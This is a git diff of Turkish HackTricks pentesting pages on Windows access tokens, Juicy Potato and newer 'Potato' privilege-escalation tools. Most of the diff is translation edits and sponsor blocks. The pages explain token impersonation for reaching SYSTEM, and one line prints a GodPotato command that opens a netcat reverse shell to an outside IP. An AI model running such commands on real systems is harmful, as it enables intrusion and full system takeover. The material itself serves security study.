* **Taklit Kimlik Bilgisi**: Bir sunucu uygulamasının geçici olarak güvenli nesnelere erişmek için istemcinin kimliğini benimsemesine olanak tanır. Bu mekanizma dört seviyede işler:
|
||||
* **Birincil Kimlik Bilgisi**: Bir işlemin güvenlik kimlik bilgilerinin bir temsili olarak hizmet eder. Birincil kimlik bilgisinin oluşturulması ve işlemlerle ilişkilendirilmesi, ayrıcalık ayrımı ilkesini vurgulayan yükseltilmiş ayrıcalıklar gerektiren eylemlerdir. Genellikle, kimlik doğrulama servisi kimlik bilgisi oluştururken, oturum açma servisi kullanıcının işletim sistemi kabuğuyla ilişkilendirir. İşlemlerin oluşturulduğunda, işlemler ebeveyn işleminin birincil kimlik bilgisini devralırlar.
|
||||
* **Taklit Kimlik Bilgisi**: Bir sunucu uygulamasının geçici olarak güvenli nesnelere erişmek için istemcinin kimliğini benimsemesini sağlar. Bu mekanizma dört seviyede işler:
|
||||
* **Anonim**: Sunucuya kimliği belirsiz bir kullanıcı gibi erişim sağlar.
|
||||
* **Tanımlama**: Sunucunun nesnelere erişim için kullanmadan istemcinin kimliğini doğrulamasına izin verir.
|
||||
* **Taklit**: Sunucunun istemcinin kimliği altında çalışmasını sağlar.
|
||||
|
@ -105,28 +100,28 @@ Mevcut iki tür kimlik bilgisi vardır:
|
|||
|
||||
#### Kimlik Bilgilerini Taklit Etme
|
||||
|
||||
Metasploit'in _**incognito**_ modülünü kullanarak yeterli ayrıcalıklara sahipseniz, diğer **kimlik bilgilerini** kolayca **listeleyebilir** ve **taklit edebilirsiniz**. Bu, **diğer kullanıcı gibi işlemler gerçekleştirmek** için kullanışlı olabilir. Bu teknikle ayrıca **ayrıcalıkları yükseltebilirsiniz**.
|
||||
Yeterli ayrıcalığınız varsa metasploit'in _**incognito**_ modülünü kullanarak diğer **kimlik bilgilerini listelemek** ve **taklit etmek** kolaydır. Bu, **diğer kullanıcı gibi işlemler gerçekleştirmek** için kullanışlı olabilir. Bu teknikle ayrıca **ayrıcalıkları yükseltebilirsiniz**.
|
||||
|
||||
### Kimlik Bilgisi Ayrıcalıkları
|
||||
### Kimlik Bilgileri Ayrıcalıkları
|
||||
|
||||
**Ayrıcalıkları yükseltmek için kötüye kullanılabilecek kimlik bilgisi ayrıcalıklarını öğrenin:**
|
||||
**Ayrıcalıkları yükseltmek için kötüye kullanılabilecek kimlik bilgilerini öğrenin:**
|
||||
|
||||
{% content-ref url="privilege-escalation-abusing-tokens.md" %}
|
||||
[privilege-escalation-abusing-tokens.md](privilege-escalation-abusing-tokens.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
[**Tüm olası kimlik bilgisi ayrıcalıklarını ve bazı tanımlamaları bu harici sayfada inceleyin**](https://github.com/gtworek/Priv2Admin).
|
||||
[**Tüm olası kimlik bilgisi ayrıcalıklarına ve bazı tanımlamalara bu harici sayfada göz atın**](https://github.com/gtworek/Priv2Admin).
|
||||
|
||||
## Referanslar
|
||||
|
||||
Bu öğreticilerde kimlik bilgileri hakkında daha fazla bilgi edinin: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) ve [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını kontrol etmek için ücretsiz** işlevsellikler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -141,7 +136,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
* **Bir ** **cybersecurity şirketinde mi çalışıyorsunuz? Şirketinizi HackTricks'te görmek ister misiniz? veya PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**The PEASS Ailesi**](https://opensea.io/collection/the-peass-family)'ni keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* **[💬](https://emojipedia.org/speech-balloon/) Discord grubuna** katılın veya [telegram grubuna](https://t.me/peass) katılın veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'u takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks repo**'suna ve **hacktricks-cloud repo**'ya PR'lar göndererek paylaşın.
|
||||
* **[💬](https://emojipedia.org/speech-balloon/) Discord grubuna** katılın veya [telegram grubuna](https://t.me/peass) veya beni **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve hacktricks-cloud depolarına PR göndererek paylaşın.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,23 +2,23 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
* **Bir **cybersecurity şirketinde mi çalışıyorsunuz? Şirketinizin **HackTricks'te reklamını görmek** ister misiniz? ya da **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* **Katılın** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve hacktricks-cloud depolarına PR göndererek paylaşın.**
|
||||
* **Katılın** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'u takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo'ya**](https://github.com/carlospolop/hacktricks-cloud) **PR göndererek paylaşın.**
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar tarafından tehlikeye atılıp atılmadığını kontrol etmek için ücretsiz işlevler sunar**.
|
||||
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -36,7 +36,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
## Juicy Potato (altın ayrıcalıklarını kötüye kullanma) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
|
||||
|
||||
_Biraz meyve suyu eklenmiş_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_'nun şekerlenmiş versiyonu, yani **Windows Hizmet Hesaplarından NT AUTHORITY\SYSTEM'e başka bir Yerel Ayrıcalık Yükseltme aracı**_
|
||||
_Biraz meyve suyu eklenmiş_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_nun şekerlenmiş versiyonu, yani **Windows Hizmet Hesaplarından NT AUTHORITY\SYSTEM'e** **başka bir Yerel Ayrıcalık Yükseltme aracı**_
|
||||
|
||||
#### Juicypotato'yı [buradan indirebilirsiniz](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
|
||||
|
||||
|
@ -44,21 +44,21 @@ _Biraz meyve suyu eklenmiş_ [_RottenPotatoNG_](https://github.com/breenmachine/
|
|||
|
||||
[**Juicy-potato Readme'den**](https://github.com/ohpe/juicy-potato/blob/master/README.md)** alınmıştır:**
|
||||
|
||||
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) ve [varyantları](https://github.com/decoder-it/lonelypotato) [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [servisine](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) dayalı ayrıcalık yükseltme zincirini kullanan ve `127.0.0.1:6666` üzerinde MiTM dinleyicisi olan ve `SeImpersonate` veya `SeAssignPrimaryToken` ayrıcalıklarına sahip olduğunuzda çalışan bir araçtır. Bir Windows derlemesi incelemesi sırasında, `BITS`'in kasıtlı olarak devre dışı bırakıldığı ve port `6666`'nın alındığı bir yapı bulduk.
|
||||
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) ve [varyantları](https://github.com/decoder-it/lonelypotato) [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [servisine](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) dayalı ayrıcalık yükseltme zincirini kullanan ve `127.0.0.1:6666` üzerinde MiTM dinleyicisi olan ve `SeImpersonate` veya `SeAssignPrimaryToken` ayrıcalıklarına sahip olduğunuzda çalışan bir yapıya sahiptir. Bir Windows derlemesi incelemesi sırasında, `BITS`'in kasıtlı olarak devre dışı bırakıldığı ve port `6666`'nın alındığı bir yapı bulduk.
|
||||
|
||||
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) silahlandırmaya karar verdik: **Juicy Potato'ya hoş geldiniz**.
|
||||
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)'yi silahlandırmaya karar verdik: **Juicy Potato'ya hoş geldiniz**.
|
||||
|
||||
> Teori için [Rotten Potato - Hizmet Hesaplarından SYSTEM'e Ayrıcalık Yükseltme](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) makalesine bakın ve bağlantıları ve referansları takip edin.
|
||||
> Teori için [Rotten Potato - Hizmet Hesaplarından SYSTEM'e Ayrıcalık Yükseltme](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) ve bağlantılar ve referanslar zincirini takip edin.
|
||||
|
||||
`BITS` dışında, kötüye kullanabileceğimiz birkaç COM sunucusu olduğunu keşfettik. Sadece:
|
||||
`BITS` dışında, kötüye kullanabileceğimiz birkaç COM sunucusu olduğunu keşfettik. Bunlar sadece:
|
||||
|
||||
1. mevcut kullanıcı tarafından anında oluşturulabilir olmaları gerekir, genellikle bir "hizmet kullanıcısı" olup kimlik hırsızlığı ayrıcalıklarına sahiptir
|
||||
2. `IMarshal` arabirimini uygulamak
|
||||
3. yükseltilmiş bir kullanıcı olarak çalıştırılmalıdır (SYSTEM, Yönetici, …)
|
||||
1. mevcut kullanıcı tarafından anında oluşturulabilir, genellikle bir "hizmet kullanıcısı" olup kimlik hırsızlığı ayrıcalıklarına sahiptir
|
||||
2. `IMarshal` arabirimini uygular
|
||||
3. yükseltilmiş bir kullanıcı olarak çalışır (SYSTEM, Yönetici, …)
|
||||
|
||||
Birkaç Windows sürümünde [ilginç CLSID'lerin](http://ohpe.it/juicy-potato/CLSID/) kapsamlı bir listesini elde ettik ve test ettik.
|
||||
Biraz testten sonra, çeşitli Windows sürümlerinde [ilginç CLSID'lerin](http://ohpe.it/juicy-potato/CLSID/) kapsamlı bir listesini elde ettik ve test ettik.
|
||||
|
||||
### Detaylar <a href="#juicy-details" id="juicy-details"></a>
|
||||
### Juicy detaylar <a href="#juicy-details" id="juicy-details"></a>
|
||||
|
||||
JuicyPotato size şunları yapmanızı sağlar:
|
||||
|
||||
|
@ -95,11 +95,11 @@ Optional args:
|
|||
|
||||
[**Juicy Potato Readme'den**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
|
||||
|
||||
Kullanıcıda `SeImpersonate` veya `SeAssignPrimaryToken` ayrıcalıkları varsa, o zaman **SYSTEM**'dır.
|
||||
Kullanıcı `SeImpersonate` veya `SeAssignPrimaryToken` ayrıcalıklarına sahipse, o zaman **SYSTEM**'dir.
|
||||
|
||||
Tüm bu COM Sunucularının kötüye kullanımını engellemek neredeyse imkansızdır. Bu nesnelerin izinlerini `DCOMCNFG` aracılığıyla değiştirmeyi düşünebilirsiniz ama başarılar, bu zor olacak.
|
||||
Tüm bu COM Sunucularının kötüye kullanımını engellemek neredeyse imkansızdır. Bu nesnelerin izinlerini `DCOMCNFG` aracılığıyla değiştirmeyi düşünebilirsiniz ancak başarılar, bu oldukça zor olacaktır.
|
||||
|
||||
Gerçek çözüm, `* SERVICE` hesapları altında çalışan hassas hesapları ve uygulamaları korumaktır. `DCOM`'u durdurmak kesinlikle bu açığı engeller ancak altta yatan işletim sistemine ciddi bir etkisi olabilir.
|
||||
Gerçek çözüm, `* SERVICE` hesapları altında çalışan hassas hesapları ve uygulamaları korumaktır. `DCOM`'u durdurmak kesinlikle bu saldırıyı engelleyecektir ancak altta yatan işletim sistemi üzerinde ciddi bir etkiye sahip olabilir.
|
||||
|
||||
Kaynak: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
|
||||
|
||||
|
@ -130,7 +130,7 @@ c:\Users\Public>
|
|||
|
||||
## CLSID Sorunları
|
||||
|
||||
Genellikle, JuicyPotato'nun varsayılan CLSID'si **çalışmaz** ve güvenlik açığı başarısız olur. Genellikle, **çalışan bir CLSID** bulmak için birden fazla deneme yapmak gerekir. Belirli bir işletim sistemi için denemek için bir CLSID listesi almak için şu sayfayı ziyaret etmelisiniz:
|
||||
Genellikle, JuicyPotato'nun kullandığı varsayılan CLSID **çalışmaz** ve güvenlik açığı başarısız olur. Genellikle, **çalışan bir CLSID** bulmak için birden fazla deneme yapmak gerekir. Belirli bir işletim sistemi için denemek için bir CLSID listesi almak için şu sayfayı ziyaret etmelisiniz:
|
||||
|
||||
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
|
||||
|
||||
|
@ -138,9 +138,9 @@ Genellikle, JuicyPotato'nun varsayılan CLSID'si **çalışmaz** ve güvenlik a
|
|||
|
||||
İlk olarak, juicypotato.exe dışında bazı yürütülebilir dosyalara ihtiyacınız olacak.
|
||||
|
||||
[Join-Object.ps1'yi](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) indirin ve PS oturumunuza yükleyin, ardından [GetCLSID.ps1'i](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1) indirin ve çalıştırın. Bu betik, test etmek için olası CLSID'lerin bir listesini oluşturacaktır.
|
||||
[Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) dosyasını indirin ve PS oturumunuza yükleyin, ardından [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1) dosyasını indirin ve yürütün. Bu betik, test etmek için olası CLSID'lerin bir listesini oluşturacaktır.
|
||||
|
||||
Daha sonra [test\_clsid.bat'ı indirin](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat) (CLSID listesi ve juicypotato yürütülebilir dosyasının yolunu değiştirin) ve çalıştırın. Her CLSID'yi denemeye başlayacak ve **port numarası değiştiğinde, bu CLSID'in çalıştığı anlamına gelecektir**.
|
||||
Daha sonra [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(CLSID listesi ve juicypotato yürütülebilir dosyasının yolunu değiştirin) dosyasını indirin ve yürütün. Her CLSID'yi denemeye başlayacak ve **port numarası değiştiğinde, bu CLSID'nin çalıştığı anlamına gelecektir**.
|
||||
|
||||
**Çalışan CLSID'leri** -c parametresini kullanarak **kontrol edin**
|
||||
|
||||
|
@ -148,13 +148,13 @@ Daha sonra [test\_clsid.bat'ı indirin](https://github.com/ohpe/juicy-potato/blo
|
|||
|
||||
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için ücretsiz işlevsellikler sunan **dark-web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için ücretsiz işlevsellikler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
|
@ -165,9 +165,9 @@ Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsi
|
|||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? veya PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* **💬** [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya beni **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **üzerinden PR gönderin.**
|
||||
* **💬** [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya beni Twitter'da takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Hacking püf noktalarınızı göndererek** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **üzerinden PR'lar gönderin.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!</summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
- **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
- [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
- 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u takip edin.
|
||||
- **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -29,7 +29,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
---
|
||||
|
||||
{% hint style="warning" %}
|
||||
**JuicyPotato**, Windows Server 2019 ve Windows 10 sürümü 1809'dan itibaren çalışmamaktadır. Ancak, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) aynı ayrıcalıkları kullanmak ve `NT AUTHORITY\SYSTEM` seviyesine erişmek için kullanılabilir. Bu [blog yazısı](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/), JuicyPotato'nun artık çalışmadığı Windows 10 ve Server 2019 ana bilgisayarlarında kimlik hırsızlığı ayrıcalıklarını kötüye kullanmak için kullanılabilecek `PrintSpoofer` aracına derinlemesine gider.
|
||||
**JuicyPotato**, Windows Server 2019 ve Windows 10 sürümü 1809'dan sonrasında çalışmaz. Ancak, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) aynı ayrıcalıkları kullanmak ve `NT AUTHORITY\SYSTEM` seviyesine erişim sağlamak için kullanılabilir. Bu [blog yazısı](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/), JuicyPotato'nun artık çalışmadığı Windows 10 ve Server 2019 ana bilgisayarlarında kimlik hırsızlığı ayrıcalıklarını kötüye kullanmak için kullanılabilecek `PrintSpoofer` aracına derinlemesine gider.
|
||||
{% endhint %}
|
||||
|
||||
## Hızlı Demo
|
||||
|
@ -90,28 +90,28 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
|||
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
||||
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketlerin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!</summary>
|
||||
|
